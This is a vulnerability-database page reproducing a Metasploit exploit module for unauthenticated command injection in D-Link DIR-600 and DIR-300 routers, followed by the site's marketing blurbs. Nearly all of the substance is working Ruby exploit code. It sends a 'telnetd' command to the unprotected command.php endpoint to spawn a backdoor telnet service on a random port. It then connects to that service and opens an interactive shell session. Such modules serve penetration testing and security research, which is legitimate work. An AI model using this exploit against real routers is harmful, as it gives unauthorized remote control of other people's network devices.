Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

D-Link Devices Unauthenticated Remote Command Execution

🗓️ 05 Aug 2013 20:28:59Reported by Michael Messner <[email protected]>, juan vazquez <[email protected]>Type 
metasploit
 metasploit🔗 www.rapid7.com👁 29 Views

D-Link Routers Unauthenticated Remote Command Execution Vulnerabilit

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'D-Link Devices Unauthenticated Remote Command Execution',
      'Description' => %q{
        Various D-Link Routers are vulnerable to OS command injection via the web
        interface. The vulnerability exists in command.php, which is accessible without
        authentication. This module has been tested with the versions DIR-600 2.14b01,
        DIR-300 rev B 2.13.
      },
      'Author'      =>
        [
          'Michael Messner <devnull[at]s3cur1ty.de>', # Vulnerability discovery and Metasploit module
          'juan vazquez' # minor help with msf module
        ],
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          [ 'OSVDB', '89861' ],
          [ 'EDB', '24453' ],
          [ 'BID', '57734' ],
          [ 'URL', 'http://web.archive.org/web/20240619081418/http://www.dlink.com/uk/en/home-solutions/connect/routers/dir-600-wireless-n-150-home-router' ],
          [ 'URL', 'http://www.s3cur1ty.de/home-network-horror-days' ],
          [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-003' ]
        ],
      'DisclosureDate' => '2013-02-04',
      'Privileged'     => true,
      'Platform'       => 'unix',
      'Arch'        => ARCH_CMD,
      'Payload'     =>
        {
          'Compat'  => {
            'PayloadType'    => 'cmd_interact',
            'ConnectionType' => 'find',
          },
        },
      'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
      'Targets'        =>
        [
          [ 'Automatic',	{ } ]
        ],
      'DefaultTarget'  => 0
      ))

    register_advanced_options(
      [
        OptInt.new('TelnetTimeout', [ true, 'The number of seconds to wait for a reply from a Telnet command', 10]),
        OptInt.new('TelnetBannerTimeout', [ true, 'The number of seconds to wait for the initial banner', 25]),
        OptInt.new('SessionTimeout', [ true, 'The number of seconds to wait before building the session on the telnet connection', 10])
      ])

  end

  def tel_timeout
    (datastore['TelnetTimeout'] || 10).to_i
  end

  def banner_timeout
    (datastore['TelnetBannerTimeout'] || 25).to_i
  end

  def session_timeout
    (datastore['SessionTimeout'] || 10).to_i
  end

  def exploit
    telnetport = rand(32767) + 32768

    print_status("#{rhost}:#{rport} - Telnet port used: #{telnetport}")

    cmd = "telnetd -p #{telnetport}"

    #starting the telnetd gives no response
    print_status("#{rhost}:#{rport} - Sending exploit request...")
    request(cmd)

    print_status("#{rhost}:#{rport} - Trying to establish a telnet connection...")
    ctx = { 'Msf' => framework, 'MsfExploit' => self }
    sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i, 'Context' => ctx })

    if sock.nil?
      fail_with(Failure::Unreachable, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
    end

    add_socket(sock)

    print_status("#{rhost}:#{rport} - Trying to establish a telnet session...")
    prompt = negotiate_telnet(sock)
    if prompt.nil?
      sock.close
      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to establish a telnet session")
    else
      print_good("#{rhost}:#{rport} - Telnet session successfully established... trying to connect")
    end

    print_status("#{rhost}:#{rport} - Trying to create the Msf session...")
    begin
      Timeout.timeout(session_timeout) do
        activated = handler(sock)
        while(activated !~ /claimed/)
          activated = handler(sock)
        end
      end
    rescue ::Timeout::Error
      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to establish a Msf session")
    end
  end

  def request(cmd)

    uri = '/command.php'

    begin
      res = send_request_cgi({
        'uri'    => uri,
        'method' => 'POST',
        'vars_post' => {
          "cmd" => cmd
          }
      })
    return res
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{rhost}:#{rport} - Could not connect to the webservice")
    end
  end

  def negotiate_telnet(sock)
    begin
      Timeout.timeout(banner_timeout) do
        while(true)
          data = sock.get_once(-1, tel_timeout)
          return nil if not data or data.length == 0
          if data =~ /\x23\x20$/
            return true
          end
        end
      end
    rescue ::Timeout::Error
      return nil
    end
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
28 Feb 2025 11:29Current
7.8High risk
Vulners AI Score7.8
d-link routerscommand injectionunauthenticated accessvulnerabilityos command injectionweb interfacedir-600dir-300telnet commandexploitremote connectionsecurity document
29